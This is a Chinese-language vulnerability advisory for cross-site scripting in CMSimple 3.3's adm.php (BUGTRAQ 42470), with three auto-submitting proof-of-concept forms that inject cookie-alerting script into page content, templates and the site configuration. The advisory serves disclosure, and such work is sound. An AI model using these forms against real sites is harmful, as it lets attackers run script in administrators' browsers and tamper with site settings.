发布日期：2010-08-17
更新日期：2010-09-19

受影响系统：

CMSimple CMSimple 3.3

描述：

---

BUGTRAQ  ID: 42470

CMSimple是基于PHP的小型网站内容管理工具。

CMSimple的/cmsimple/adm.php脚本没有正确地验证用户所提交的text、site_title等参数，远程攻击者可以通过提交恶意参数请求执行反射式跨站脚本攻击。

<*来源：High-Tech Bridge SA （http://www.htbridge.ch/）
  
  链接：http://www.htbridge.ch/advisory/xss_vulnerability_in_cmsimple_2.html
        http://www.htbridge.ch/advisory/xss_vulnerability_in_cmsimple_1.html
        http://www.htbridge.ch/advisory/xss_vulnerability_in_cmsimple.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<form action="http://host/" method="post" name="main" >
<input type="hidden" name="text" value='<html><head><title>The name of the site - Content</title><meta name="keywords" content="key"><meta name="description" content="description"><meta http-equiv="content-type" content="text/html;charset=UTF-8"><link rel="stylesheet" href="./templates/default/stylesheet.css" type="text/css"></head><body><H1>Welcome</H1><P>code and <script>alert(document.cookie)</script></P></body></html>' />
<input type="hidden" name="file" value="content" />
<input type="hidden" name="action" value="save" />
</form>
<script>
document.main.submit();
</script>


<form action="http://host/" method="post" name="main" >

<input type="hidden" name="text" value='php and html code of template<script>alert(document.cookie)</script>' />
<input type="hidden" name="file" value="template" />
<input type="hidden" name="action" value="save" />

</form>
<script>
document.main.submit();
</script>


<form action="http://host/" method="post" name="main" >

<input type="hidden" name="security_password" value="test" />
<input type="hidden" name="security_type" value="page" />
<input type="hidden" name="site_title" value='CMSimple site"><script>alert(document.cookie)</script>' />
<input type="hidden" name="site_template" value="default" />
<input type="hidden" name="language_default" value="ru" />
<input type="hidden" name="meta_keywords" value="CMSimple, Content Management System, php" />
<input type="hidden" name="meta_description" value="CMSimple is a content management system" />
<input type="hidden" name="backup_numberoffiles" value="5" />
<input type="hidden" name="images_maxsize" value="150000" />
<input type="hidden" name="downloads_maxsize" value="1000000" />
<input type="hidden" name="mailform_email=" value="" />
<input type="hidden" name="editor_height" value="(screen.availHeight)-400" />
<input type="hidden" name="editor_external" value="" />
<input type="hidden" name="menu_color" value="000000" />
<input type="hidden" name="menu_highlightcolor" value="808080" />
<input type="hidden" name="menu_levels" value="3" />
<input type="hidden" name="menu_levelcatch" value="10" />
<input type="hidden" name="menu_sdoc" value="" />
<input type="hidden" name="menu_legal" value="CMSimple Legal Notices" />
<input type="hidden" name="uri_seperator" value=":" />
<input type="hidden" name="uri_length" value="200" />
<input type="hidden" name="xhtml_endtags" value="" />
<input type="hidden" name="xhtml_amp" value="true" />
<input type="hidden" name="plugins_folder" value="" />
<input type="hidden" name="functions_file" value="functions.php" />
<input type="hidden" name="scripting_regexp" value="\#CMSimple (.*?)\#" />
<input type="hidden" name="form" value="array" />
<input type="hidden" name="file" value="config" />
<input type="hidden" name="action" value="save" />

</form>
<script>
document.main.submit();
</script>

建议：

---

厂商补丁：

CMSimple
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.cmsimple.dk/

浏览次数：2354
严重程度：0（网友投票）